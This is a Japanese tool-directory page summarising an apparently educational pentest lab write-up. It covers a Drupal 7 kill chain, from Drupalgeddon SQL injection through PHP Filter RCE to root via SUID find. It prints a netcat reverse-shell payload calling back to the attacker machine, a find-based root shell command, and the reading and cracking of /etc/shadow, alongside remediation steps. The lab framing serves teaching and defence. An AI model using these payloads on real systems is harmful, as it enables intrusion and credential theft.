Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/fbm31/audit-blackbox-web-to-root
パスワードクラッキング特権昇格偵察脆弱性分析エクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテストコマンド&コントロール

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
学習と教育
ラボと実践
GitHubfbm31/audit-blackbox-web-to-root

Audit-BlackBox-Web-to-Root

Drupal 7サーバーのブラックボックスセキュリティ監査。完全なキルチェーンのデモンストレーション:SQLインジェクション(CVE-2014-3704)➔ RCE ➔ リバースシェル ➔ Root(SUID)への権限昇格。このリポジトリには、詳細な技術レポート、エクスプロイトの証明(PoC)、およびインフラを保護するための是正措置が含まれています。

リポジトリを見る
7ヶ月前未レビュー

Pentest Lab : Web および システム の エクスプロイト チェーン (Drupal から Root へ)

免責事項

このプロジェクトは、教育および学術目的のために、管理され隔離されたラボ環境で実施されました。実際のインフラストラクチャは標的にされていません。目的は、攻撃メカニズムを理解することでシステムのセキュリティを強化する方法を学ぶことです。


作業環境と目的

シナリオ

このプロジェクトの目的は、ブラックボックス監査を実施することです。これは、対象に関する事前知識なしに分析を開始することを意味します。つまり、識別子、技術文書、ソースコードは一切提供されていません。

ラボのアーキテクチャ

インフラストラクチャは、外部との相互作用を避けるために、VMware 上で隔離されたプライベートネットワーク (ホストオンリー) 内に仮想的に展開されました。

  • 攻撃マシン (Kali Linux) : 192.168.78.131
    • ツール : Nmap, Python, Netcat, John the Ripper。
  • ターゲットマシン (被害者) : 192.168.78.132
    • OS : Linux (Debian)。
    • 初期状態 : 不明。

フェーズ 1 : 偵察と探索

最初のステップは、ポートスキャンを使用してターゲットマシンの攻撃対象領域をマッピングすることでした。

実行コマンド : nmap -sV 192.168.78.132

Nmap Scan

特定されたサービス :

  • ポート 22 (TCP) : SSH (OpenSSH 6.0p1)。
  • ポート 80 (TCP) : HTTP サーバー (Apache 2.2.22)。
  • ポート 111 (TCP) : rpcbind。

Web サービス (ポート 80) と robots.txt ファイルの分析により、CMS Drupal の存在が明らかになりました。ソースコードの検査により、古いバージョン Drupal 7.x が特定されました。


脆弱性分析

偵察フェーズの結果、重大な攻撃対象領域が明らかになりました。メンテナンスされていない CMS Drupal 7 です。このバージョンは、歴史的に重大なセキュリティ脆弱性(特に "Drupalgeddon")に対して脆弱であることが知られています。

この状況を受けて、監査は公知の脆弱性 (CVE) の対象を絞った調査に方向性を変えました。この列挙により、単なる Web 訪問者からシステム管理者 "Root" に至る完全なエクスプロイトチェーンの存在が確認されました。

特定された攻撃ベクトル :

  1. Web : SQL インジェクション (CVE-2014-3704)。
  2. アプリケーション : "PHP Filter" モジュールの誤った設定。
  3. システム : システムバイナリ上の危険な SUID 権限。

エクスプロイト (キルチェーン)

ステップ 1 : 初期侵入 (SQL インジェクション)

脆弱性 CVE-2014-3704 (Drupalgeddon) の悪用。Drupal のデータベース API におけるこの脆弱性により、認証なしで SQL コマンドを注入することが可能になります。

  • アクション : 管理者権限を持つ新しいユーザーを users テーブルに注入。
  • 結果 : CMS の管理パネルへのアクセス。

Exploit SQLi

Python スクリプトを入手

ステップ 2 : コード実行 (RCE & リバースシェル)

管理者としてログインした後、ネイティブの PHP Filter モジュールを利用。このモジュールは誤って設定されており、サイトのページ内で任意の PHP コードを実行することができます。

  • Payload : <?php system('nc -e /bin/bash 192.168.78.131 4444'); ?>
  • 結果 : Kali マシン上でリモートシェルを取得 (ユーザー www-data)。

Reverse Shell

ステップ 3 : 権限昇格 (Root へ)

SUID (Set User ID) 権限を持つファイルの分析。find コマンドに重大な設定を発見。

  • エスカレーションコマンド : find . -exec '/bin/sh' \;
  • 結果 : find バイナリが root として実行され、Root (uid=0) 権限でシェルが起動。

ステップ 4 : ポストエクスプロイテーション

root アクセスを取得した後、ユーザーパスワードのハッシュ値を外部に持ち出すために、機密ファイル /etc/shadow を読み取り。

  • アクション : 辞書攻撃を使用して SHA-512 ハッシュを解析するために John the Ripper を使用。
  • 結果 : root/ユーザーパスワード (低複雑性) の取得。システム上での永続化が可能に。

Reverse Shell

まとめ

監査の結果、リスクレベルは重大であることが判明しました。古い CMS とシステム設定 (SUID) の怠慢の組み合わせにより、サーバー全体が侵害される可能性があります。

ビジネスへの影響 :

  • 機密性 : 顧客データベースおよびシステムファイル (/etc/shadow) の外部持ち出しが可能。
  • 完全性 : サイトデータの完全な変更または削除。
  • 可用性 : 妨害行為またはサービス中断のリスク。

優先的なアクションプラン :

  1. アップデート : SQLi の脆弱性を修正するために Drupal を最新の安定版に移行。
  2. システム強化 : 不要な実行ファイルから SUID ビットを削除 (chmod u-s /usr/bin/find)。
  3. 最小権限 : 厳密に必要でない場合は PHP Filter モジュールを無効化。

ドキュメンテーション

完全な技術的詳細、使用されたスクリプト、および詳細な分析については、完全なレポートを参照してください: 監査レポートを読む (PDF)

著者

Fabien MOINE

ツールをダウンロード